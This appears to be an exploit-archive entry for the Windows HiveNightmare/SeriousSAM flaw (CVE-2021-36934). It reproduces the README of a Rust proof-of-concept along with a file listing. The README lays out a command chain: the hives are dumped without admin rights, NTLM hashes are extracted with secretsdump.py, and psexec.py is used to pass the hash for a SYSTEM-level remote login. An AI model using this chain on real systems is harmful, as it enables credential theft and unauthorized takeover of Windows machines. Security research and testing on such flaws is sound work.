POC details: 0a6c9d5b456fc995c3523b0893d62c45ba0d7228

Source
Related vulnerability
Title: Microsoft Windows access control error vulnerability (CVE-2021-36934)
Description: Microsoft Windows is a desktop operating system from the US company Microsoft. Microsoft Windows has an access control error vulnerability: the access control lists (ACLs) on several system files are overly permissive, which results in a privilege escalation vulnerability. An attacker who successfully exploits it can run arbitrary code with SYSTEM privileges.
Description
Exploit for CVE-2021-36934
Introduction
# Oxide Hive
An exploit for the HiveNightmare/SeriousSAM vulnerability that lets you read registry hives containing sensitive data without admin privileges. If that doesn't sound like privilege escalation, I don't know what does.

# Usage
After building the exploit with `cargo build` and retrieving the binary, deploy it in your testing environment, open CMD and run `.\oxide_hive [max shadow copies]`; the default number of shadow copies to try is 15. The SAM, SECURITY and SYSTEM hives should be dumped to the working directory.

From then on you can use [this script](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) with the command `secretsdump.py -sam SAM.dump -security SECURITY.dump -system SYSTEM.dump local` to retrieve the NTLM hashes.
Then you can use [another script](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py) with the command `psexec.py -hashes <account's hash> <user>@<machine's ip> cmd.exe` to remotely log into any account. Congrats, you just went from unprivileged user to NT Authority with only 3 commands.

# Credits
- @jonasLyk, the person who discovered the vulnerability
- @GossiTheDog, the creator of [the original exploit](https://github.com/GossiTheDog/HiveNightmare) which I took inspiration from
File snapshot

```
[4.0K] /data/pocs/0a6c9d5b456fc995c3523b0893d62c45ba0d7228
├── [ 179] Cargo.toml
├── [1.0K] LICENSE
├── [1.2K] README.md
└── [4.0K] src
    └── [3.7K] main.rs

1 directory, 4 files
```
The Shenlong bot has cached this for you
Notes
    1. We recommend accessing the POC through its source first.
    2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.